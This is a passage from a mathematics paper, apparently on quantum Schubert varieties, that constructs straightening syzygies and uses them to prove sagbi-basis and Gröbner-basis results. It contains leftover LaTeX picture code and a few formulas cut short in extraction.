&x_{1,3}^{(1)}\cdot t&0&0&0\\ \rule{0pt}{17pt}
x_{2,1}^{(1)}\cdot t&x_{2,2}^{(1)}\cdot t
&0&0&0 &x_{2,6}^{(0)} \\
0&0&0&x_{3,4}^{(0)}&x_{3,5}^{(0)}& 0
\end{array}\right]\,.$$ We evaluate the $3 \times 3$-minors of this matrix to find the $k$-algebra homomorphism $\,\varphi_{{235^{(2)}/146^{(1)}}} $. It takes polynomials in $12$ variables $\,\gamma^{(c)}\,$ to polynomials in $8$ variables $x^{(l)}_{i,j}$ as follows: $$\begin{array}{c}
146^{(1)} \mapsto -x^{(1)}_{1,1} x^{(0)}_{2,6} x^{(0)}_{3,4} \,\,, \quad
156^{(1)} \mapsto -x^{(1)}_{1,1} x^{(0)}_{2,6} x^{(0)}_{3,5} \,\, ,\quad
246^{(1)} \mapsto -x^{(1)}_{1,2} x^{(0)}_{2,6} x^{(0)}_{3,4} \,,
256^{(1)} \mapsto -x^{(1)}_{1,2} x^{(0)}_{2,6} x^{(0)}_{3,5} \,\, ,\quad
346^{(1)} \mapsto -x^{(1)}_{1,3} x^{(0)}_{2,6} x^{(0)}_{3,4} \,\, ,\quad
356^{(1)} \mapsto -x^{(1)}_{1,3} x^{(0)}_{2,6} x^{(0)}_{3,5} \, ,
124^{(2)} \mapsto x^{(1)}_{1,1} x^{(1)}_{2,2} x^{(0)}_{3,4}
- x^{(1)}_{2,1} x^{(1)}_{1,2} x^{(0)}_{3,4} \, , \quad
125^{(2)} \mapsto x^{(1)}_{1,1} x^{(1)}_{2,2} x^{(0)}_{3,5}
- x^{(1)}_{2,1} x^{(1)}_{1,2} x^{(0)}_{3,5}\, ,
134^{(2)} \mapsto -x^{(1)}_{2,1} x^{(1)}_{1,3} x^{(0)}_{3,4} \,\, ,\qquad
135^{(2)} \mapsto -x^{(1)}_{2,1} x^{(1)}_{1,3} x^{(0)}_{3,5} \,,
234^{(2)} \mapsto -x^{(1)}_{2,2} x^{(1)}_{1,3} x^{(0)}_{3,4} \,\, ,\qquad
235^{(2)} \mapsto -x^{(1)}_{2,2} x^{(1)}_{1,3} x^{(0)}_{3,5} .\end{array}\vspace{-4pt}$$ The $12$ variables $\gamma^{(c)}$ appearing on the left sides above are precisely the elements in the interval $\,\bigl[146^{(1)}, 235^{(2)} \bigr]\,$ of the distributive lattice ${\mathcal C}_{3,3}$. There are $18$ incomparable pairs in this interval, each giving a quadratic generator for the kernel of $\,\varphi_{{235^{(2)}/146^{(1)}}} $. This set of $18$ quadrics consists of $14$ binomials and four trinomials, and it equals the reduced Gröbner basis with respect to $\prec$. For example, one of the 14 binomials in this Gröbner basis is the underlined leading binomial of $\,\, S(156^{(1)},234^{(2)})\, $ in (\[BigSyzygy\]), and one of the four trinomials is $$\underline{ 346^{(1)} \cdot 125^{(2)} } \,\, - \,\,
246^{(1)} \cdot 135^{(2)} \,\, + \,\,
146^{(1)} \cdot 235^{(2)}.$$ The underlined term is an incomparable pair in $\bigl[146^{(1)}, 235^{(2)} \bigr]$, while the other two monomials are comparable pairs. Erasing the third term gives a binomial as in Proposition \[lem:toric\].
Construction of Straightening Syzygies {#sec:syzygy}
The following theorem is the technical heart of this paper. All three of Theorem \[issagbi\], Theorem \[thm:gbasis\], and Proposition \[ItIsDominant\] will be derived from Theorem \[thm:syzygy\] in the end of this section.
\[thm:syzygy\] Let $\gamma^{(c)},\delta^{(d)}$ be a pair of incomparable variables in the poset ${\mathcal C}^{np}_{p,m}$. There is a quadric $S(\gamma^{(c)},\delta^{(d)})$ in the kernel of $\varphi : k[{\mathcal C}^{np}_{p,m}] \rightarrow k[X]$ whose first two monomials are $$\gamma^{(c)}\cdot\delta^{(d)}\ -\
(\gamma^{(c)}\vee\delta^{(d)}) \cdot (\gamma^{(c)}\wedge\delta^{(d)}).$$ Moreover, if $\lambda\beta^{(b)}\alpha^{(a)}$ is any non-initial monomial in $S(\gamma^{(c)},\delta^{(d)})$, then $\gamma^{(c)},\delta^{(d)}\in[\beta^{(b)},\alpha^{(a)}]$.
The pair $ \beta^{(b)}\alpha^{(a)}$ in the second assertion is necessarily standard, i.e. $\beta^{(b)}<\alpha^{(a)}$. The quadrics $S(\gamma^{(c)},\delta^{(d)})$ are not constructed explicitly, but rather through an iterative procedure modeled on the [*subduction algorithm*]{} in [image]{}$(\varphi)$. A main idea is to utilize the well-known subduction process [@Sturmfels_invariant Algorithm 3.2.6] modulo the $p \times p$-minors of a generic $p \times N$-matrix.
Set $N:=(n+1)(m+p)$. Let ${\mathcal N}$ be the $p\times N$-matrix whose $i,j$th entry is $x^{(l)}_{i,r}$, where $j= (m+p)l+r$ with $1\leq r\leq m+p$. If ${\mathcal N}_l$ is the submatrix of ${\mathcal N}$ consisting of the entries $x^{(l)}_{i,j}$, then ${\mathcal N}$ is the concatenation of ${\mathcal N}_0,{\mathcal N}_1,\ldots,{\mathcal N}_n$ and ${\mathcal M}(t)=
{\mathcal N}_0+t{\mathcal N}_1+\cdots+t^n{\mathcal N}_n$. Sequences $\,J:j_1<\cdots<j_p\in\binom{[ N]}{p}\,$ are regarded as variables. We write $\phi(J)$ for the $J$th maximal minor of ${\mathcal N}$. [*Young’s poset*]{} on sequences $J$ is given by componentwise comparison and is graded via $\,|J| := \sum_i (j_i-i)$. The coefficient $\varphi(\alpha^{(a)})$ of $t^a$ in the $\alpha$th maximal minor of ${\mathcal M}(t)$ is an alternating sum of maximal minors of ${\mathcal N}$. The exact formula is $$\label{eq:phi_expand}
\varphi(\alpha^{(a)})\quad \,\,\, =\quad
\sum_{\stackrel{\mbox{\scriptsize $|J|=|\alpha^{(a)}|$}} {J\equiv\alpha\,\bmod{(m+p)}}}
\!\! \epsilon_J \cdot \phi(J),$$ where $\epsilon_J$ is the sign of the permutation that orders the following sequence: $$j_1\bmod(m+p),\ j_2\bmod(m+p),\ \ldots,\ j_p\bmod(m+p).$$
The polynomial rings $k[{\mathcal C}^{np}_{p,m}]$ and $k[\binom{[N]}{p}]$ are graded with $\deg\alpha^{(a)}=|\alpha^{(a)}|$ and $\deg J=|J|$. Consider the degree-preserving $k$-algebra homomorphism $\pi:k[{\mathcal C}^{np}_{p,m}]\rightarrow k[\binom{[N]}{p}]$ defined by $$\label{eq:pidef}
\pi(\alpha^{(a)})\quad \,\, \, =\quad
\sum_{\stackrel{\mbox{\scriptsize $|J|=|\alpha^{(a)}|$}} {J\equiv\alpha\,\bmod{(m+p)}}}
\!\! \epsilon_J \cdot J\,.$$ Lexicographic order on the sequences $J\in\binom{[ N]}{p}$ gives a linear extension of Young’s poset. In this ordering, the initial term of (\[eq:pidef\]) is the sequence $J(\alpha^{(a)})$ defined in (\[eq:seq\_def\]). This sequence is characterized by $\, {\rm in}_\prec \,\varphi(\alpha^{(a)}) \, = \,{\rm in}_\prec
\, \phi(J(\alpha^{(a)}))$. It can be checked that all other terms $ \epsilon_J \cdot J \,$ appearing in (\[eq:pidef\]) satisfy $\, J_1 < J(\alpha^{(a)})_1 \,$ and $\, J_p-J_1 \ >\ m+p $. For example, for $m = 4$, $$\pi(235^{(2)}) \quad = \quad
\underline{ (5, 9, 10)}
- (3, 9, 12)
+ (3, 5, 16)
+ (2, 10, 12)
- (2, 5, 17)
+ (2,3,19),$$ $$\mbox{and} \qquad
{\rm in}_\prec \bigl( \varphi( \,235^{(2)} \,) \bigr) \quad = \quad
{\rm in}_\prec\bigl(\phi( 5,9,10) \bigr) \quad = \quad
x_{2,2}^{(1)} . \qquad$$
For $J\in\binom{[ N]}{p}$, let ${\mathcal N}_J$ be the specialization of ${\mathcal N}$ where in each row $i$, all entries in columns greater than $j_i$ are set to zero. Under the identification of ${\mathcal N}$ with ${\mathcal M}(t)$, we have ${\mathcal N}_{J(\alpha^{(a)})}={\mathcal M}_{\alpha^{(a)}}$. Let $\phi_J : k [\binom{[N]}{p}] \rightarrow k[X] $ denote the $k$-algebra homomorphism which maps the formal variable $I$ to the $I$th maximal minor of ${\mathcal N}_J$. Then $\phi_J(I)$ vanishes unless $I\leq J$. In particular, if $|I|=|J|$, then $\phi_J(I)$ vanishes unless $I=J$, and in that case, it is just the product of the last non-zero variables in each row of ${\mathcal N}_J$. From this it follows that $$\label{SomeIdentities}
& \varphi_{\alpha^{(a)}} \quad = \quad
\phi_{J(\alpha^{(a)})} \circ \pi \\\rule{0pt}{15pt}
& \varphi_{\alpha^{(a)}}(\alpha^{(a)}) \,\, =\,\,
\phi_{J(\alpha^{(a)})}(J(\alpha^{(a)})) \,\, = \,\,
{\rm in}_\prec \, \varphi(\alpha^{(a)}) \,\, =
\,\, \psi(\alpha^{(a)}).
\end{array}$$ In the Plücker embedding of [*Grass*]{}$_pk^{ N}$ into ${\mathbb P}(\wedge^p k^{N})$, the Schubert variety indexed by $J$ is $$\Omega_J\quad :=\quad \{y=(y_I)\in {\it Grass}_pk^{ N}\mid
y_I=0\mbox{ if }I\not\leq J \}\ .$$ The homogeneous ideal ${\mathcal I}(\Omega_J)$ which defines this Schubert variety is precisely the kernel of $\phi_J$. The following identity of ideals in $k[\binom{[N]}{p}]$ follows from the classical Plücker relations:
\[prop:Schubert-ideal\] For any $J\in\binom{[ N]}{p}$ we have $$\bigcap_{I<J}{\mathcal I}(\Omega_I)\quad =\quad
{\mathcal I}(\Omega_J) \, + \, \left\langle\, J \,\right\rangle\,.$$
The map $\pi:k[{\mathcal C}^{np}_{p,m}]\rightarrow k[\binom{[N]}{p}]$ induces a birational isomorphism $\pi^*:{\it Grass}_pk^{ N}\dashrightarrow K^{np}_{p,m}$. From the identification of ${\mathcal M}_{\alpha^{(a)}}(t)$ with ${\mathcal N}_{J(\alpha^{(a)})}$ and Proposition \[ItIsDominant\], we will see that $\pi^*(\Omega_{J(\alpha^{(a)})})$ is a dense subset of $\, Z_{\alpha^{(a)}}$. We also consider the image under $\pi^*$ of the Schubert varieties $\Omega_J$ for $\, J<J(\alpha^{(a)})$.
\[prop:O\_J-image\] If $J<J(\alpha^{(a)})$, then $$\pi^*(\Omega_J)\quad \subset\quad
\bigcup_{\beta^{(b)}<\alpha^{(a)}} Z_{\beta^{(b)}}\,.$$
[**Proof.** ]{} The inclusion $\Omega_J\subset\Omega_{J(\alpha^{(a)})}$ implies $\pi^*(\Omega_J)\subset Z_{\alpha^{(a)}}$. Since $\varphi_{\alpha^{(a)}}(\alpha^{(a)})$ is the product of leading entries in the rows of ${\mathcal N}_{J(\alpha^{(a)})}$, it follows that $\varphi_{\alpha^{(a)}}(\alpha^{(a)})$ vanishes under the specialization to ${\mathcal N}_J$, and hence $\pi(\alpha^{(a)})$ vanishes on $\Omega_J$. This implies our claim because $\bigcup_{\beta^{(b)}<\alpha^{(a)}} Z_{\beta^{(b)}}$ is defined as a subvariety of $ Z_{\beta^{(b)}}$ by the vanishing of $\alpha^{(a)}$.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
For $L<J$ in Young’s poset, define ${\mathcal N}_{J/L}$ to be the specialization of ${\mathcal N}$ where in the $i$th row, only the entries in columns $l_i,l_i+1,\ldots,j_i$ are non-zero. Then ${\mathcal M}_{\alpha^{(a)}/\beta^{(b)}}(t)$ is the specialization of ${\mathcal M}(t)$ corresponding to ${\mathcal N}_{J(\alpha^{(a)})/J(\beta^{(b)})}(t)$. Define the $k$-algebra homomorphism $\,\phi_{J/I} : k [\binom{[N]}{p}] \rightarrow k[X] \,$ by evaluating the appropriate minors on ${\mathcal N}_{J/L}$. We observe that $$\label{eq:initial}
\varphi_{\alpha^{(a)}/\beta^{(b)}}(\alpha^{(a)}) &=&
{\rm in}_\prec \, \varphi(\alpha^{(a)}) \quad =
\quad \phi_{J(\alpha^{(a)})/J(\beta^{(b)})}\bigl( J(\alpha^{(a)})\bigr),
\varphi_{\alpha^{(a)}/\beta^{(b)}}(\beta^{(b)}) &=&
{\rm in}_\prec \, \varphi(\beta^{(b)})
\quad = \quad \phi_{J(\alpha^{(a)})/J(\beta^{(b)})}\bigl( J(\beta^{(b)})\bigr).
The following lemma is very useful in our proof of Theorem \[thm:syzygy\].
\[lem:factor\] Fix $\alpha^{(a)} \in {\mathcal C}^{np}_{p,m}$ and let $f\in k[{\mathcal C}^{np}_{p,m}]$ be a quadratic form of degree $d$.
1. Suppose that $\varphi_{\beta^{(b)}}(f)=0$ for all $\beta^{(b)}<\alpha^{(a)}$. Then there exist constants $\lambda_J\in k$ with $$\varphi_{\alpha^{(a)}}(f)\quad =\quad
\varphi_{\alpha^{(a)}}(\alpha^{(a)}) \,\, \cdot \!\!\!\!
\sum_{\stackrel{\mbox{\scriptsize $J \in \binom{[ N]}{p}$}} {|J|+|\alpha^{(a)}|=d}}
\lambda_J \cdot \phi_{J(\alpha^{(a)})}(J)\,.$$
2. Suppose $\beta^{(b)}<\alpha^{(a)}$ and $\varphi_{\alpha^{(a)}/\gamma^{(c)}}(f)=0$ for all $\beta^{(b)}<\gamma^{(c)}\leq\alpha^{(a)}$. For some $\lambda_J\in k$, $$\varphi_{\alpha^{(a)}/\beta^{(b)}}(f)\quad =\quad
\varphi_{\alpha^{(a)}/\beta^{(b)}}(\beta^{(b)}) \, \cdot
\!\!\!\! \sum_{\stackrel{\mbox{\scriptsize $J \in \binom{[ N]}{p}$}} {|J|+|\beta^{(b)}|=d}} \lambda_J\cdot
[**Proof.** ]{} We only prove part 1. The hypothesis states that $\, \phi_{J(\alpha^{(a)})}(\pi(f)) \, = \,
\varphi_{\alpha^{(a)}}(f) \, $ vanishes on all matrices ${\mathcal N}_{J(\beta^{(b)})}$ for $\beta^{(b)}<\alpha^{(a)}$. Proposition \[prop:O\_J-image\] implies that $\pi(f)$ vanishes on all Schubert varieties $\Omega_J$ with $J<J(\alpha^{(a)})$. But then, using Proposition \[prop:Schubert-ideal\], $$\pi(f)\quad \in\quad
\bigcap_{J<J(\alpha^{(a)})}{\mathcal I}(\Omega_J)\quad =\quad
{\mathcal I}(\Omega_{J(\alpha^{(a)})}) \, + \,
\left\langle \, J(\alpha^{(a)}) \, \right\rangle.$$ This means $\,\pi(f)=g + J(\alpha^{(a)})\cdot h$, where $g\in {\mathcal I}(\Omega_{J(\alpha^{(a)})})=
{\rm ker} \bigl(\phi_{J(\alpha^{(a)})} \bigr) $ and $h\in k[\binom{[N]}{p}]$ is a linear form of degree $d-|\alpha^{(a)}|$. Such a linear form can be written as follows $$h \, \quad =\quad \sum_{|J|+|\alpha^{(a)}|=d} \! \! \lambda_J\,J\,.$$ By applying the map $\, \phi_{J(\alpha^{(a)})} \,$ to both sides of the equation $\,\pi(f)=g + J(\alpha^{(a)})\cdot h$, we obtain the first assertion of Lemma \[lem:factor\]. Part 2 is proved by similar arguments.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
Our proof of Theorem \[thm:syzygy\] will show that the sums in Lemma \[lem:factor\] are actually sums of terms of the form $\,\lambda_{J(\delta^{(d)})}\cdot\varphi_{\alpha^{(a)}}(\delta^{(d)})\,$ and $\,\lambda_{J(\delta^{(d)})}\cdot
\varphi_{\alpha^{(a)}/\beta^{(b)}}(\delta^{(d)}) \,$ respectively. The next lemma provides the initial step in our inductive proof of Theorem \[thm:syzygy\].
\[lem:initial\] Let $\gamma^{(c)}$ and $\delta^{(d)}$ be incomparable variables in the poset ${\mathcal C}^{np}_{p,m}$ and set $\alpha^{(a)}:=\gamma^{(c)}\vee\delta^{(d)}$. Then $
\varphi_{\alpha^{(a)}}(\gamma^{(c)}\cdot\delta^{(d)}\ -\
[**Proof.** ]{} We prove the lemma by inductively showing that, for each $\,\beta^{(b)}\leq\alpha^{(a)}$, $$\label{eq:lt}
\bigl( \, \gamma^{(c)}\cdot\delta^{(d)}\ -\
\gamma^{(c)}\vee\delta^{(d)}\cdot\gamma^{(c)}\wedge\delta^{(d)} \,\bigr)
\quad = \quad 0.$$ If $\beta^{(b)}\not\leq\gamma^{(c)}\wedge\delta^{(d)}$, then $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\gamma^{(c)}\wedge\delta^{(d)})$ vanishes, and either $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\gamma^{(c)})$ vanishes or $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\delta^{(d)})$ vanishes. This implies that (\[eq:lt\]) holds.
Next suppose $\beta^{(b)}=\gamma^{(c)}\wedge\delta^{(d)}$. We claim that $\varphi_{\alpha^{(a)}/\beta^{(b)}}$ maps each variable appearing in (\[eq:lt\]) to its initial term in $k[X]$. In view of Proposition \[lem:toric\], this claim implies (\[eq:lt\]). To establish this claim, we need only show that $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\gamma^{(c)})=
{\rm in}_\prec\varphi(\gamma^{(c)})$, as the case for $\delta^{(d)}$ is similar and that of the other terms follow from (\[eq:initial\]). Consider the expansion of $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\gamma^{(c)})$ in terms of the minors $\phi(J)$ of ${\mathcal N}_{J(\alpha^{(a)})/J(\beta^{(b)})}$. First observe that the submatrix given by the columns from $J(\gamma^{(c)})$ is block anti-diagonal, with each block either upper or lower triangular along its anti-diagonal. This is because for each $i$, $J(\gamma^{(c)})_i$ is either $J(\beta^{(b)})_i$ or $J(\alpha^{(a)})_i$, and the non-zero entries in the $i$th row of ${\mathcal N}_{J(\alpha^{(a)})/J(\beta^{(b)})}$ lie between these two numbers. Thus the contribution of term $J(\gamma^{(c)})$ to $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\gamma^{(c)})$ is simply ${\rm in}_\prec \, \varphi(\gamma^{(c)})$.
We claim there are no other terms. If there were another term indexed by $L$, then the $L$th maximal minor of ${\mathcal N}_{J(\alpha^{(a)})/J(\beta^{(b)})}$ would be non-zero, and so $J(\beta^{(b)})\leq L\leq J(\alpha^{(a)})$. Thus $$J(\beta^{(b)})\quad =\quad J(\gamma^{(c)})\wedge J(\delta^{(d)})
\quad \leq\quad L\wedge J(\delta^{(d)}).$$ Comparing the first components of these sequences gives $\min\{J(\gamma^{(c)})_1,J(\delta^{(d)})_1\}\leq L_1$. Since $L_1<J(\gamma^{(c)})_1$, this implies $J(\delta^{(d)})_1\leq L_1$. Similarly, using $J(\alpha^{(a)})\geq L\vee J(\delta^{(d)})$, we see that $J(\delta^{(d)})_p\geq L_p$. Lastly, as $L$ is a summand in $\pi(\gamma^{(c)})$ and $L\neq J(\gamma^{(c)})$, we have $L_p-L_1> m+p$ and thus $$m+p\ \geq\ J(\delta^{(d)})_p-J(\delta^{(d)})_1\ \geq\
L_p-L_1\ >\ m+p,$$ a contradiction, which proves the claim. Thus (\[eq:lt\]) holds for $\beta^{(b)}=\gamma^{(c)}\wedge\delta^{(d)}$.
Finally, let $\zeta^{(z)}<\gamma^{(c)}\wedge\delta^{(d)}$ and suppose that (\[eq:lt\]) holds for all $\beta^{(b)}$ with $\zeta^{(z)}<\beta^{(b)}\leq \alpha^{(a)}$. Then by Lemma \[lem:factor\], $$\varphi_{\alpha^{(a)}/\zeta^{(z)}}\bigl(\gamma^{(c)}\cdot\delta^{(d)}\ -\
\gamma^{(c)}\vee\delta^{(d)}\cdot\gamma^{(c)}\wedge\delta^{(d)} \bigr)
\quad =\quad
\sum_{J}\lambda_J \cdot
\phi_{J(\alpha^{(a)})/J(\zeta^{(z)})}(J)\,,$$ the sum over sequences $J$ of rank $|J|=|\gamma^{(c)}|+|\delta^{(d)}|-|\zeta^{(z)}|$. But this exceeds the rank of $\alpha^{(a)}$, since $\zeta^{(z)}<\gamma^{(c)}\wedge\delta^{(d)}$ and $|\alpha^{(a)}|+|\gamma^{(c)}\wedge\delta^{(d)}|
=|\gamma^{(c)}|+|\delta^{(d)}|$. Thus the sum vanishes and so (\[eq:lt\]) holds for all $\beta^{(b)}\leq\alpha^{(a)}$, which proves the lemma.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
[**Proof of Theorem \[thm:syzygy\].** ]{} Let $\gamma^{(c)}$ and $\delta^{(d)}$ be incomparable variables in the poset ${\mathcal C}^{np}_{p,m}$. For each $\alpha^{(a)}\in{\mathcal C}^{np}_{p,m}$ we inductively construct quadratic polynomials $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})\in
k[\beta^{(s)}\mid\beta^{(s)}\leq \alpha^{(a)}]$, and then show $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})$ is in the kernel of the map $\varphi_{\alpha^{(a)}}$. The case when $\alpha^{(a)}$ is the top element in the poset ${\mathcal C}^{np}_{p,m}$ proves the theorem. These polynomials have the following restriction property: If $\beta^{(b)}<\alpha^{(a)}$, then $S_{\beta^{(b)}}(\gamma^{(c)},\delta^{(d)})$ is the image of $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})$ under the map which sets variables $\zeta^{(z)}\not\leq \beta^{(b)}$ to zero. They also have the further homogeneity properties that each non-zero term $\lambda\zeta^{(z)}\beta^{(b)}$ must have $z+b=c+d$ and satisfy the multiset equality $\beta\cup\zeta=\gamma\cup\delta$, and if it is not the initial term, then $\gamma^{(c)},\delta^{(d)}\in[\zeta^{(z)},\beta^{(b)}]$.
For $\alpha^{(a)}\not\geq \gamma^{(c)}\vee\delta^{(d)}$, set $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)}):=0$ and if $\alpha^{(a)}=\gamma^{(c)}\vee\delta^{(d)}$, then set $$S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})\quad:=\quad
\gamma^{(c)}\cdot\delta^{(d)}\ -\
\gamma^{(c)}\vee\delta^{(d)}\cdot\gamma^{(c)}\wedge\delta^{(d)}.$$ These polynomials have the restriction and homogeneity properties, and, for $\alpha^{(a)}\not> \gamma^{(c)}\vee\delta^{(d)}$, we have $\varphi_{\alpha^{(a)}}(S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)}))=0$, by Lemma \[lem:initial\].
Let $\alpha^{(a)}>\gamma^{(c)}\vee\delta^{(d)}$ and suppose we have constructed $S_{\beta^{(b)}}(\gamma^{(c)},\delta^{(d)})$ for each $\beta^{(b)}<\alpha^{(a)}$. By the restriction property, there is a polynomial $S'\in k[\beta^{(b)}\mid \beta^{(b)}<\alpha^{(a)}]$ which restricts to $S_{\beta^{(b)}}(\gamma^{(c)},\delta^{(d)})$ for each $\beta^{(b)}<\alpha^{(a)}$. Thus $\varphi_{\beta^{(b)}}(S')=0$ for all $\beta^{(b)}<\alpha^{(a)}$.
Set $e:=|\gamma^{(c)}|+|\delta^{(d)}|$, the degree of $S'$. By Lemma \[lem:factor\], $$\label{eq:sprime}
\varphi_{\alpha^{(a)}}(S')\quad =\quad
\sum_{|J|+|\alpha^{(a)}|=e}\lambda_J \cdot\phi_{J(\alpha^{(a)})}(J)\,.$$ If we consider the columns of ${\mathcal M}_{\alpha^{(a)}}(t)$ involved in $\varphi_{\alpha^{(a)}}(S')$, we see that this sum is further restricted to those $J$ which satisfy the multiset equality $(\gamma \cup\delta)\setminus \alpha\equiv J\mod(m+p)$, with $J\bmod(m+p)$ consisting of distinct integers, and with $J\leq J(\alpha^{(a)})$. If there are no such $J$, then $\varphi_{\alpha^{(a)}}(S')=0$ and we set $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})=S'$.
Otherwise, let $z:=c+d-a$ and $\zeta:=(\gamma\cup\delta)\setminus\alpha$. Then the summands in (\[eq:sprime\]) are among those $J$ which appear in $\pi(\zeta^{(z)})$ so we have $J(\zeta^{(z)})<J(\alpha^{(a)})$ and hence $\zeta^{(z)}<\alpha^{(a)}$. Observe that $\varphi_{\alpha^{(a)}/\zeta^{(z)}}(S')=
\lambda_{J(\zeta^{(z)})} \cdot
\varphi_{\alpha^{(a)}/\zeta^{(z)}}(\alpha^{(a)}\zeta^{(z)})$. Define $$S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)})\quad :=\quad
S' - \lambda_{J(\zeta^{(z)})} \alpha^{(a)}\zeta^{(z)}.$$ We claim that if $\lambda_{J(\zeta^{(z)})}\neq 0$, then $\zeta^{(z)}\leq\gamma^{(c)},\delta^{(d)}$. If not, then every term of $S'$ contains a variable $\xi^{(x)}$ with $\zeta^{(z)}\not\leq\xi^{(x)}$, and so we must have $\varphi_{\alpha^{(a)}/\zeta^{(z)}}(S')=0$, a contradiction.
We complete the proof of Theorem \[thm:syzygy\] by showing that for $\beta^{(b)}\leq \alpha^{(a)}$, $$\label{eq:indstep}
(\gamma^{(c)},\delta^{(d)}))\quad =\quad 0.$$ If $\beta^{(b)}\not\leq \zeta^{(z)}$, then $\varphi_{\alpha^{(a)}/\beta^{(b)}}(\zeta^{(z)})=0$ and so $\varphi_{\alpha^{(a)}/\beta^{(b)}}(S_{\alpha^{(a)}}
(\gamma^{(c)},\delta^{(d)}))=\varphi_{\alpha^{(a)}/\beta^{(b)}}(S')$, which is zero as $\phi_{J(\alpha^{(a)})/J(\beta^{(b)})}(J)=0$ for all $J$ which appear in $\pi(\zeta^{(z)})$. By the construction of $S_{\alpha^{(a)}}(\gamma^{(c)},\delta^{(d)}))$, we also have $\varphi_{\alpha^{(a)}/\zeta^{(z)}}(S_{\alpha^{(a)}}
Let $\xi^{(x)}<\zeta^{(z)}$ and suppose (\[eq:indstep\]) holds for all $\beta^{(b)}$ with $\xi^{(x)}<\beta^{(b)}$. Then by Lemma \[lem:factor\], $$\varphi_{\alpha^{(a)}/\xi^{(x)}}(S_{\alpha^{(a)}}
(\gamma^{(c)},\delta^{(d)}))\quad =\quad
\sum_{|J|+|\xi^{(x)}|=e} \lambda_J \cdot
\phi_{J(\alpha^{(a)})/J(\xi^{(x)})}(J).$$ Since $|J|=e-|\xi^{(x)}|>e-|\zeta^{(z)}|=|\alpha^{(a)}|$, each term in the right hand sum is zero.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
It is now straightforward to derive all our assertions that were left unproven so far.
[**Proof of Theorem \[issagbi\].**]{} Theorem \[thm:syzygy\] together with Proposition \[lem:toric\] shows that the subduction criterion for sagbi bases (see e.g. [@CHV Proposition 1.1] or [@Sturmfels_GBCP Theorem 11.4]) is satisfied.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
[**Proof of Theorem \[thm:gbasis\].** ]{} A standard fact on sagbi bases, proved in [@CHV Corollary 2.2] or in [@Sturmfels_GBCP Corollary 11.6 (1)], states that the reduced Gröbner basis for the binomial ideal ${\rm kernel}(\psi)$ lifts to a reduced Gröbner basis for the non-binomial ideal ${\rm kernel}(\varphi)$.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
[**Proof of Proposition \[ItIsDominant\].** ]{} If $\beta^{(b)}$ is the minimal element in the poset ${\mathcal C}_{p,m}$, then $\varphi_{\alpha^{(a)}}$ and $\varphi_{\alpha^{(a)}/\beta^{(b)}}$ have the same kernel, as the varieties $Z_{\alpha^{(a)}/\beta^{(b)}}$ and $Z_{\alpha^{(a)}}$ are equal. Hence it suffices to prove the second statement about $\varphi_{\alpha^{(a)}/\beta^{(b)}}$. Clearly, the kernel of $\varphi_{\alpha^{(a)}/\beta^{(b)}}$ contains the homogeneous ideal of the skew quantum Schubert variety $Z_{\alpha^{(a)}/\beta^{(b)}}$. If this containment were proper, then we would also get proper containment at the level of initial ideals with respect to the induced partial term order, which was denoted by ${\mathcal A}^T \omega$ in [@Sturmfels_GBCP Chapter 11]. But that is impossible since every binomial relation on the monomials $\,{\rm in}_\prec \, \varphi_{\alpha^{(a)}/\beta^{(b)}}( \gamma^{(c)}) =
